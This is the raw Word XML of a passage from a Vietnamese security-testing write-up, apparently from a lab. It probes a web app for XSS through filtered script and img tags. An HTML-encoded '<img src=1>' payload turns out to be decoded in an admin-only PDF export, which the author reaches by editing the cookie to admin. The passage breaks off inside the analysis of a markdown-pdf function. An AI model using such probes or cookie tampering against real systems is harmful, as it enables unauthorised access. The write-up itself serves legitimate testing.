    <w:p w14:paraId="2ADA4969" w14:textId="39FA65AC" w:rsidR="00FF7460" w:rsidRDefault="00FF7460">
      <w:r>
        <w:t>Tạo thử 1 thẻ javascript:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296EA80B" w14:textId="6C0EE1AE" w:rsidR="00153D32" w:rsidRDefault="00153D32">
      <w:r w:rsidRPr="00153D32">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11F4AED9" wp14:editId="7FD220B5">
            <wp:extent cx="5731510" cy="2387600"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="133062110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621109" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2387600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A12819" w14:textId="1DD2A1AC" w:rsidR="00FF7460" w:rsidRDefault="00FF7460">
      <w:r>
        <w:t>Kết quả đã không hiển thị (bị lọc như mong đợi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394176F5" w14:textId="3543B41B" w:rsidR="00395CE6" w:rsidRDefault="005D4123">
      <w:r w:rsidRPr="005D4123">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1914891B" wp14:editId="7F6B1EED">
            <wp:extent cx="5731510" cy="824865"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="570690362"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690362" name="Picture 1" descr="A black screen with white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="824865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C71F54" w14:textId="2B70F283" w:rsidR="005D4123" w:rsidRDefault="00FF7460" w:rsidP="00B820E3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sử dụng thẻ img:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C6B690" w14:textId="4F07EB23" w:rsidR="003C3B34" w:rsidRDefault="003C3B34" w:rsidP="00B820E3">
      <w:r w:rsidRPr="003C3B34">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DD47BAC" wp14:editId="539234FA">
            <wp:extent cx="5731510" cy="2368550"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="130230265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302655" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2368550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE0D40B" w14:textId="6FAFE1F2" w:rsidR="00FF7460" w:rsidRDefault="00FF7460" w:rsidP="00B820E3">
      <w:r>
        <w:t>Kết quả vẫn bị lọc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF1E3C3" w14:textId="17533B8F" w:rsidR="003C3B34" w:rsidRDefault="003C3B34" w:rsidP="00B820E3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3B34">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F209418" wp14:editId="759451D3">
            <wp:extent cx="5731510" cy="1198245"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="13864205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420558" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1198245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3332C571" w14:textId="2ADA4A4E" w:rsidR="00FF7460" w:rsidRDefault="00FF7460" w:rsidP="00B820E3">
      <w:r>
        <w:t xml:space="preserve">Vì hệ thống còn chế độ view và downloads nội dung về (chỉ sử dụng dưới quyền admin) nên mình sẽ đưa giá trị html encode của &lt; &gt; với </w:t>
      </w:r>
      <w:r w:rsidR="00880F7E" w:rsidRPr="00880F7E">
        <w:t>giả định rằng nội dung người dùng nhập vào được lưu trữ và sau đó được render lại trong chế độ xem hoặc tải về,</w:t>
      </w:r>
      <w:r w:rsidR="00BC6C73">
        <w:t xml:space="preserve"> mình sẽ </w:t>
      </w:r>
      <w:r w:rsidR="00880F7E" w:rsidRPr="00880F7E">
        <w:t>tiến hành chèn các ký tự đặc biệt &lt; và &gt; dưới dạng HTML encode (ví dụ: &lt; và &gt;) vào nội dung. Mục tiêu là kiểm tra xem hệ thống có thực hiện giải mã HTML khi render nội dung hay không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66872B71" w14:textId="7A8BFECF" w:rsidR="00880F7E" w:rsidRPr="00FF7460" w:rsidRDefault="00880F7E" w:rsidP="00B820E3">
      <w:r>
        <w:t>Thực hiện đưa vào thẻ img với ký tự &lt; &gt; được mã hóa HTML:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE6E193" w14:textId="1FF87D36" w:rsidR="001923B2" w:rsidRDefault="001923B2" w:rsidP="00B820E3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001923B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AE83C1D" wp14:editId="18F7EF1E">
            <wp:extent cx="5731510" cy="2011680"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="18808467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846764" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2011680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E71B96" w14:textId="77777777" w:rsidR="00880F7E" w:rsidRDefault="00880F7E" w:rsidP="00B820E3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CB72B84" w14:textId="77777777" w:rsidR="00880F7E" w:rsidRDefault="00880F7E" w:rsidP="00B820E3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A13E207" w14:textId="77777777" w:rsidR="00880F7E" w:rsidRDefault="00880F7E" w:rsidP="00B820E3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1540FB96" w14:textId="77777777" w:rsidR="00880F7E" w:rsidRDefault="00880F7E" w:rsidP="00B820E3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="408C4ABE" w14:textId="01CF54C7" w:rsidR="006E71DD" w:rsidRPr="006E71DD" w:rsidRDefault="006E71DD" w:rsidP="006E71DD">
      <w:r w:rsidRPr="006E71DD">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Khi nội dung chứa chuỗi &lt;img src=1&gt; được nhập và lưu lại, giao diện web hiển thị chính xác chuỗi này dưới dạng văn bản, không thực hiện render thành thẻ </w:t>
      </w:r>
      <w:r>
        <w:t>HTML:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7933D3E2" w14:textId="4CF39A17" w:rsidR="001923B2" w:rsidRDefault="001923B2" w:rsidP="00B820E3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001923B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="386B32CE" wp14:editId="647CA3CD">
            <wp:extent cx="5731510" cy="1287145"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="2753874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387442" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1287145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE8B61A" w14:textId="0A4E1E46" w:rsidR="006E71DD" w:rsidRPr="006E71DD" w:rsidRDefault="006E71DD" w:rsidP="00B820E3">
      <w:r w:rsidRPr="006E71DD">
        <w:t>Thực hiện kiểm tra tại chức năng view:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607B1083" w14:textId="20458EE4" w:rsidR="00A30E45" w:rsidRDefault="00A30E45" w:rsidP="00B820E3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A30E45">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2787797A" wp14:editId="61101CDE">
            <wp:extent cx="5731510" cy="1464310"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="173230108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301084" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId25"/>
                    <a:srcRect t="2536"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1464310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD2A177" w14:textId="76AB62FF" w:rsidR="006E71DD" w:rsidRDefault="006553EB" w:rsidP="00B820E3">
      <w:r w:rsidRPr="006553EB">
        <w:t>Chuỗi vẫn không được</w:t>
      </w:r>
      <w:r w:rsidRPr="006E71DD">
        <w:t xml:space="preserve"> thực hiện render thành thẻ </w:t>
      </w:r>
      <w:r>
        <w:t>HTML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C7871D" w14:textId="3CC4A3A2" w:rsidR="006553EB" w:rsidRPr="006553EB" w:rsidRDefault="006553EB" w:rsidP="00B820E3">
      <w:r>
        <w:t>Thực hiện tải nội dung về dưới dạng pdf (sửa cookie thành admin):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49310E45" w14:textId="1AD2FAA4" w:rsidR="00B3416D" w:rsidRDefault="00B3416D" w:rsidP="00B820E3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3416D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AE63767" wp14:editId="34C0D92B">
            <wp:extent cx="5731510" cy="1459230"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="1812828758" name="Picture 1" descr="A white background with a black b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828758" name="Picture 1" descr="A white background with a black border&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1459230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="768ED6B5" w14:textId="37340DC1" w:rsidR="002C18C9" w:rsidRPr="002C18C9" w:rsidRDefault="002C18C9" w:rsidP="002C18C9">
      <w:r w:rsidRPr="002C18C9">
        <w:t xml:space="preserve">File PDF được tạo ra có chứa một biểu tượng lỗi hình ảnh, cho thấy hệ thống đã giải mã chuỗi encode thành thẻ HTML </w:t>
      </w:r>
      <w:r w:rsidR="0097148F">
        <w:t>&lt;img src=1&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="002C18C9">
        <w:t>, sau đó cố gắng render ảnh từ nguồn src=1. Do đường dẫn ảnh không hợp lệ, trình hiển thị PDF không thể tải ảnh và hiển thị biểu tượng lỗi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBF8420" w14:textId="5009B51C" w:rsidR="005273E0" w:rsidRDefault="00B3416D" w:rsidP="005273E0">
      <w:r w:rsidRPr="00B3416D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D95D17D" wp14:editId="2C301DD8">
            <wp:extent cx="5731510" cy="1461135"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="20774003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400333" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1461135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="005273E0" w:rsidRPr="00BC6C73">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="005273E0" w:rsidRPr="005273E0">
        <w:t>uy nhiên file này không được mở trực tiếp trên trình duyệt web mà chỉ được tải về dưới dạng tệp cục bộ</w:t>
      </w:r>
      <w:r w:rsidR="005273E0" w:rsidRPr="00BC6C73">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005273E0" w:rsidRPr="00BC6C73">
        <w:t>nên không thể thực hiện XSS trực tiếp thông qua việc chèn mã JavaScript vào nội dung</w:t>
      </w:r>
      <w:r w:rsidR="005273E0" w:rsidRPr="005273E0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DC17AD" w14:textId="30F1DAA2" w:rsidR="00BC6C73" w:rsidRPr="005273E0" w:rsidRDefault="00BC6C73" w:rsidP="00A308CE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC6C73">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Để xác định rõ mức độ rủi ro, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A308CE">
        <w:t>mình</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6C73">
        <w:t xml:space="preserve"> sẽ tiến hành kiểm tra mã nguồn hệ thống, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A308CE">
        <w:t xml:space="preserve">và mình </w:t>
      </w:r>
      <w:r w:rsidR="00A308CE" w:rsidRPr="00A308CE">
        <w:t xml:space="preserve">đã thấy giá trị </w:t>
      </w:r>
      <w:r w:rsidR="00A308CE" w:rsidRPr="00A308CE">
        <w:t xml:space="preserve">generatedPDF </w:t>
      </w:r>
      <w:r w:rsidR="00A308CE" w:rsidRPr="00A308CE">
        <w:t>được tạo từ</w:t>
      </w:r>
      <w:r w:rsidR="00A308CE" w:rsidRPr="00A308CE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A308CE" w:rsidRPr="00A308CE">
        <w:t xml:space="preserve">hàm </w:t>
      </w:r>
      <w:r w:rsidR="00A308CE" w:rsidRPr="00A308CE">
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00A308CE">
        <w:t>eneratePDF:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9072" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="320"/>
        <w:gridCol w:w="8752"/>
      </w:tblGrid>
      <w:tr w:rsidR="009C31A5" w:rsidRPr="009C31A5" w14:paraId="15F4CCFE" w14:textId="77777777" w:rsidTr="00541DD4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="275" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="349A9FE9" w14:textId="54179C73" w:rsidR="009C31A5" w:rsidRPr="009C31A5" w:rsidRDefault="009C31A5" w:rsidP="009C31A5">
            <w:r>
              <w:t xml:space="preserve">13 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AF58FE1" w14:textId="77777777" w:rsidR="009C31A5" w:rsidRPr="009C31A5" w:rsidRDefault="009C31A5" w:rsidP="009C31A5">
            <w:r w:rsidRPr="009C31A5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="009C31A5">
              <w:t xml:space="preserve"> generatedPDF = </w:t>
            </w:r>
            <w:r w:rsidRPr="009C31A5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>await</w:t>
            </w:r>
            <w:r w:rsidRPr="009C31A5">
              <w:t xml:space="preserve"> generatePDF(content);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="299D633C" w14:textId="77777777" w:rsidR="009C31A5" w:rsidRPr="009C31A5" w:rsidRDefault="009C31A5" w:rsidP="009C31A5"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17E493E5" w14:textId="77777777" w:rsidR="00A308CE" w:rsidRDefault="00A308CE"/>
    <w:p w14:paraId="0710D11D" w14:textId="15CB2FEA" w:rsidR="009C31A5" w:rsidRDefault="00A308CE">
      <w:r>
        <w:t xml:space="preserve">Thực hiện phân tích hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="00A308CE">
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>eneratePDF:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9072" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="320"/>
        <w:gridCol w:w="8752"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A565E" w:rsidRPr="007A565E" w14:paraId="54738AE0" w14:textId="77777777" w:rsidTr="007A565E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3122AE1A" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="007A565E">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A7DDAEA" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6943F0B6" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E766EAD" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5080C6A7" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7751CC68" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="181BA686" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77D01627" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04EECE35" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58697A6E" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="618AAA1F" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FAD5123" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="570E7871" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="612F60E3" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71A4DC7F" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CABF3E3" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>var</w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve"> markdownpdf = require(</w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"markdown-pdf"</w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BB84021" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E"/>
          <w:p w14:paraId="768104B5" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve"> generatePDF = </w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>async</w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve"> (content) =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E9E81F9" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E"/>
